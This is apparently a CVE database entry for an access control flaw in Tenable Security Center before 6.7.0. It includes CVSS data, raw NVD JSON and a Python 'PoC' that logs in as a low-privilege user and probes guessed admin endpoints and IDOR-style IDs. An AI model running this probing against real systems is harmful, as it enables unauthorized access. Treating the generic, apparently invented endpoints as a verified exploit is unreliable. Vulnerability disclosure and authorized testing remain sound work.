Security Vulnerability Report
中文
CVE-2025-36636 CVSS 4.3 MEDIUM

CVE-2025-36636

Published: 2025-10-08 16:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Tenable Security Center versions prior to 6.7.0, an improper access control vulnerability exists where an authenticated user could access areas outside of their authorized scope.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tenable Security Center < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36636 - Tenable Security Center Improper Access Control PoC # This PoC demonstrates how a low-privileged authenticated user can access # resources outside their authorized scope. import requests TARGET_URL = "https://target-tenable-sc.example.com" LOW_PRIV_USER = "lowpriv_user" LOW_PRIV_PASS = "password123" # Step 1: Authenticate with low-privilege credentials session = requests.Session() login_url = f"{TARGET_URL}/login" login_data = { "username": LOW_PRIV_USER, "password": LOW_PRIV_PASS } response = session.post(login_url, data=login_data) print(f"[*] Login response status: {response.status_code}") # Step 2: Attempt to access admin-restricted resources # These endpoints should be restricted to admin users only admin_endpoints = [ "/admin/users", "/admin/organizations", "/admin/scan-templates", "/scans/configurations", "/reports/advanced", "/api/v1/users", "/api/v1/organizations", "/api/v1/scans/configurations" ] print("[*] Testing access to restricted endpoints...") for endpoint in admin_endpoints: url = f"{TARGET_URL}{endpoint}" resp = session.get(url) status = resp.status_code if status == 200: print(f"[VULNERABLE] {endpoint} -> HTTP {status} (Unauthorized access granted!)") elif status in [403, 401]: print(f"[SAFE] {endpoint} -> HTTP {status} (Properly restricted)") else: print(f"[?] {endpoint} -> HTTP {status}") # Step 3: Attempt IDOR by modifying resource IDs # Try to access other users' data by changing ID parameters print("\n[*] Testing IDOR vulnerability...") idor_endpoints = [ "/scans/results?scanId=1", "/reports/view?reportId=1", "/assets/details?assetId=1" ] for endpoint in idor_endpoints: for resource_id in range(1, 10): url = f"{TARGET_URL}{endpoint.split('=')[0]}={resource_id}" resp = session.get(url) if resp.status_code == 200 and "admin" in resp.text.lower(): print(f"[VULNERABLE] IDOR found at ID={resource_id}") break

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36636", "sourceIdentifier": "[email protected]", "published": "2025-10-08T16:15:37.437", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Tenable Security Center versions prior to 6.7.0, an improper access control vulnerability exists where an authenticated user could access areas outside of their authorized scope."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://docs.tenable.com/release-notes/Content/security-center/2025.htm#670", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.